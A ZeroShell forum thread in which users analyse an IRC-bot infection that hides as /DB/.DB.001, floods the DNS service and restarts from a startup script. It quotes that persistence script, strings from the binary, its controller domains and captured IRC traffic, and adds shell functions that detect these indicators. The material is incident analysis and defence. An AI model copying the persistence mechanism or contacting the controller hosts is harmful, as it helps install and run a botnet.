www.zeroshell.org Forum Index www.zeroshell.org
Linux Distribution for server and embedded devices
DoS on DNS Zeroshell: Malware!

fsala
Joined: 06 Nov 2013
Posts: 3

Posted: Wed Nov 06, 2013 3:50 pm    Post subject: DoS on DNS Zeroshell: Malware!

Hi all,
I found malware on one of our ZS boards that creates a DoS on the Zeroshell DNS with 20k connections to it.

Full analysis on the Italian board (sorry, Italian only, I'll translate it in a while...): http://www.zeroshell.net/forum/viewtopic.php?t=4115
fsala
Joined: 06 Nov 2013
Posts: 3

Posted: Wed Nov 06, 2013 3:59 pm

In short:

The issue is a running hidden executable (/DB/.DB.001) that opens thousands of connections to the DNS.
File attributes are set to hide it and make deletion harder.

Code:

root@zeroshell DB> ls -al
total 131252
drwxr-xr-x    4 root     root         4096 Oct 21 17:09 .
drwxr-xr-x   21 root     root          520 Nov  6 12:55 ..
-rwxr-xr-x    1 root     root        23289 Nov 21  2012 .DB.001
drwxr-xr-x    7 root     root         4096 Jul  2  2012 _DB.001
drwx------    2 root     root        16384 Apr 20  2011 lost+found
-rw-r--r--    1 root     root     134217728 Apr 20  2011 swap-file

root@zeroshell DB> lsattr .DB.001
-u--ia--------- .DB.001


To deactivate/rename it:
Code:

killall -9 .DB.001 ; chattr -iua .DB.001 ; mv .DB.001 DB-malware


I analyzed the activity with "strace": there are thousands of connections to the DNS with queries for "zeroshell.will.mx" and "zeroshell.samhan.biz", and the binary contains code to open an IRC connection (like a lot of worms).

The executable is started at boot, inside the "Database Update" script (you find it in the Startup/Cron area), and is scheduled to restart every 2 minutes.
Code:

# SSL Security Check
Security=$(cat /etc/httpd/ssl.conf | grep C100-Security-Fix-beta12)
if [ -z "$Security" ] && [ -f "/Database/var/register/system/ssl/ssl.conf" ]; then
        cp -rf /Database/var/register/system/ssl/ssl.conf /etc/httpd/ssl.conf
        httpd=$(pidof httpd);kill -HUP $httpd
fi

# Database Update
Database=$(pidof .DB.001)
if [ -z "$Database" ]; then
        /DB/.DB.001
fi
echo "OK"


It also changes the SSL configuration of Apache:
Code:

#     C100-Security-Fix-beta12
<Directory "/usr/local/apache2/cgi-bin">
    SSLOptions +StdEnvVars
        RewriteEngine On
        RewriteCond %{REQUEST_METHOD} GET
        RewriteCond %{QUERY_STRING} [a-zA-Z0-9_]=http:// [OR]
        RewriteCond %{QUERY_STRING} [a-zA-Z0-9_]=(//?)+ [OR]
        RewriteCond %{QUERY_STRING} [a-zA-Z0-9_]=(\.\.//?)+ [OR]
        RewriteCond %{QUERY_STRING} [a-zA-Z0-9_]=/([a-z0-9_.]//?)+ [NC]
        RewriteRule .* - [F]
</Directory>


The binary payload contains these kinds of strings (IRC connection, browser emulation...), so I'm sure it's malware:

Code:

zeroshell.will.mx
zeroshell.samhan.biz
r/usr/dict/words%s : USERID : UNIX : %s
http://GET /%s HTTP/1.0
User-Agent: Mozilla/4.75 (X11; U; Linux 2.2.16-3 i686)
NICK %s
 HELPIRC SH export PATH=/bin:/sbin:/usr/bin:/usr/local/bin:/usr/sbin;%sNOTICE %s :%s
MODE %s -xi
JOIN %s :%s
WHO %s
PONG %s
352376433422PRIVMSGPINGNICKmkdir /tmp/lol/lib/kw+#z1zNICK %s
USER %s localhost localhost


At the moment I don't know what the infection entry point was, but I suspect a bug in the OpenSSL library or in that area...

Hope it helps!

Fabrizio Sala/Netdream
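A read-only triage check for the host indicators fsala lists above (the hidden /DB/.DB.001, its protective attributes, the "Database Update" relaunch script, the C100-Security-Fix-beta12 marker in ssl.conf, and a running instance), added here as an example; it is not code from the thread or from the ZeroShell project. It assumes the caller supplies the directory holding the Startup/Cron scripts (the post names the script but not its path) and, optionally, an alternate root and procfs so it can run against a copied tree; the function name zs_triage and the argument layout are this example's own.

```shell
#!/bin/sh
# Added example (not from the thread or from ZeroShell): report the indicators
# described in the post without changing anything.
#   zs_triage [ROOT] [SCRIPT_DIR] [PROC]
#     ROOT       filesystem root to inspect ("" or / = the live box)
#     SCRIPT_DIR directory with the Startup/Cron scripts (assumption: caller supplies it)
#     PROC       procfs to scan (default /proc)
# Prints one "IOC: ..." line per finding; returns 1 if anything was found, 0 if clean.
zs_triage() {
    root="${1%/}"            # "/" and "" both become "" so "$root/DB" is /DB
    scrdir="${2:-}"
    proc="${3:-/proc}"
    found=0

    # 1. Hidden executable in the DB partition (the file from the ls -al listing).
    if [ -f "$root/DB/.DB.001" ]; then
        echo "IOC: hidden executable $root/DB/.DB.001"
        found=1
        # The i/a/u bits shown by lsattr ("-u--ia---" in the post) exist only on ext
        # filesystems, so this part is best-effort and skipped when lsattr is missing.
        if command -v lsattr >/dev/null 2>&1; then
            attrs=$(lsattr -d "$root/DB/.DB.001" 2>/dev/null | cut -d' ' -f1)
            case "$attrs" in
                *[iau]*) echo "IOC: attributes $attrs protect the file (clear with chattr -iua)" ;;
            esac
        fi
    fi

    # 2. Persistence: the "Database Update" script relaunches .DB.001 whenever pidof
    #    finds no running copy. Any startup script naming the binary is suspect.
    if [ -n "$scrdir" ] && [ -d "$scrdir" ]; then
        for f in "$scrdir"/*; do
            [ -f "$f" ] || continue
            if grep -q '\.DB\.001' "$f"; then
                echo "IOC: startup script $f launches .DB.001"
                found=1
            fi
        done
    fi

    # 3. Apache SSL config carrying the marker comment, and the planted copy the
    #    script restores it from if the marker disappears.
    for conf in "$root/etc/httpd/ssl.conf" "$root/Database/var/register/system/ssl/ssl.conf"; do
        if [ -f "$conf" ] && grep -q 'C100-Security-Fix-beta12' "$conf"; then
            echo "IOC: marker C100-Security-Fix-beta12 in $conf"
            found=1
        fi
    done

    # 4. Running instance. In the thread ps aux shows pid 14049 as "sleep 1800" while
    #    pstree shows .DB.001: ps prints the command line, which the bot evidently
    #    rewrote, whereas pstree prints the kernel's comm name. So match comm and the
    #    exe link, not the argv string.
    for c in "$proc"/[0-9]*/comm; do
        [ -f "$c" ] || continue
        pid="${c%/comm}"; pid="${pid##*/}"
        name=$(cat "$c" 2>/dev/null || true)
        exe=$(readlink "$proc/$pid/exe" 2>/dev/null || true)
        if [ "$name" = ".DB.001" ] || [ "${exe##*/}" = ".DB.001" ]; then
            echo "IOC: pid $pid running .DB.001 (comm=$name exe=$exe)"
            found=1
        fi
    done

    return $found
}

# Usage on the box (placeholder path for the Startup/Cron script directory):
#   zs_triage / /path/to/startup-scripts
```

The function only reports; the kill / chattr -iua / mv sequence from the post is left to the operator so that a copy of the binary and its attributes can be preserved first.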
bbozo
Joined: 31 Mar 2008
Posts: 46
Location: Srbija

Posted: Thu Dec 05, 2013 1:34 pm    Post subject: also infected

ZS 1 b16
ZS 2 rc2
almost all my routers (4 of 5) were infected

Is there going to be some kind of patch?

fsala thank you!!!!
_________________
Mej d fors bi vit ju!!!
drsox
Joined: 09 Jan 2014
Posts: 13

Posted: Thu Jan 09, 2014 8:13 pm

I've found one of my installations infected with this too.

Can we try and narrow down what we have in common to work out the infection method?

I am running a Release 2.0.RC2 setup, running since circa 17/02/2013.

I have (open to the world):
-Port 80 (the web interface)
-Port 443 (the web interface)
-Some LAN-to-LAN (OpenVPN) connections.
Code:
-rwxr-xr-x    1 root     root        23289 Nov 21  2012 .DB.001

Yet other installations have not been infected.
OK Installation 1 = Release 2.0.RC2 / Port 80 (Zeroshell server) only open to the world (Port 443 is blocked) running for about a year.

OK Installation 2 = Release 2.0.RC2 / No ports open to the world running for about 2 months

OK Installation 3 = Release 2.0.RC1 / Port 80, 443 and SSH open to the world running for about a year

Both hosts referenced in the copy I have are the same as the OP's:
zeroshell.will.mx
and
zeroshell.samhan.biz
Luckily, neither of these resolves, and given the date on the infection I presume this must be a very, very old infection that we've only just discovered.
Code:
root@zeroshell DB> pstree -Gp
init(1)─┬─.DB.001(14049)
root@zeroshell DB> ps aux | grep 14049
root      7832  0.0  0.0  1944  244 pts/0    S    03:33   0:00 grep 14049
root     14049  0.0  0.2  2036  640 ?        S     2013  64:09 sleep 1800


I killed and reloaded the process; it spawned two of itself and instantly tried to resolve zeroshell.will.mx and zeroshell.samhan.biz.
I forced my network to respond with an IP, and the infection then tried to contact zeroshell.will.mx on port 53 over TCP using the IRC protocol:
Code:
NICK WORO
USER DCRK localhost localhost :VQYJWO

Tom - www.mouselike.org
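The network behaviour drsox describes (repeated lookups of the two controller names, then IRC commands sent to TCP port 53) can be checked from logs without touching the infected box. The following is an added example, not code from the thread or from ZeroShell: it works on two constructed text formats, a DNS query log with "client=<ip> query=<name>" fields and a one-line-per-payload export of traffic with "<src> <dst>:<port> <first token>", so the awk field positions are assumptions to adapt to the real log source. The names are the ones quoted in the thread; the function names are this example's own. The per-client threshold check also covers fsala's original symptom of one host opening 20k connections.

```shell
#!/bin/sh
# Added example (not from the thread): log-side detection for the controller names,
# for query floods from a single client, and for IRC spoken to port 53.

# Controller names quoted in the thread.
C2_NAMES='zeroshell.will.mx zeroshell.samhan.biz'

# 1. Queries for the controller names, counted per client. Input lines (constructed
#    format): "<time> client=<ip> query=<name>". Prints "client name count";
#    returns 1 if any were seen, 0 otherwise.
c2_query_counts() {
    awk -v names="$C2_NAMES" '
        BEGIN { n = split(names, arr, " "); for (i = 1; i <= n; i++) bad[arr[i]] = 1 }
        {
            client = ""; name = ""
            for (i = 1; i <= NF; i++) {
                if ($i ~ /^client=/) client = substr($i, 8)
                if ($i ~ /^query=/)  name   = tolower(substr($i, 7))   # names are case-insensitive
            }
            if (name in bad) hits[client " " name]++
        }
        END {
            for (k in hits) { print k, hits[k]; found = 1 }
            exit (found ? 1 : 0)
        }' "$1"
}

# 2. Clients sending more than THRESH queries in the log, whatever the name: a bot
#    that hammers the resolver shows up here even after its names stop resolving.
#    noisy_clients LOG THRESH  ->  prints "client count"; returns 1 if any exceed it.
noisy_clients() {
    awk -v thresh="$2" '
        { for (i = 1; i <= NF; i++) if ($i ~ /^client=/) total[substr($i, 8)]++ }
        END {
            for (c in total) if (total[c] > thresh) { print c, total[c]; found = 1 }
            exit (found ? 1 : 0)
        }' "$1"
}

# 3. IRC commands in payloads sent to port 53, which a resolver never speaks.
#    Input lines (constructed format): "<src> <dst>:<port> <first token> ...".
#    The command list is taken from the strings in the binary and drosx's capture.
irc_on_dns_port() {
    awk '
        $2 ~ /:53$/ && $3 ~ /^(NICK|USER|JOIN|PRIVMSG|NOTICE|PONG|MODE|WHO)$/ {
            print "IRC over port 53:", $1, "->", $2, $3, $4
            found = 1
        }
        END { exit (found ? 1 : 0) }' "$1"
}
```

Each function returns 1 when it finds something, so they drop straight into a cron job or a monitoring check; drsox's trick of answering the two names locally turns the first check into a sinkhole log of which hosts are still calling home.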
All times are GMT
Powered by phpBB © 2001, 2005 phpBB Group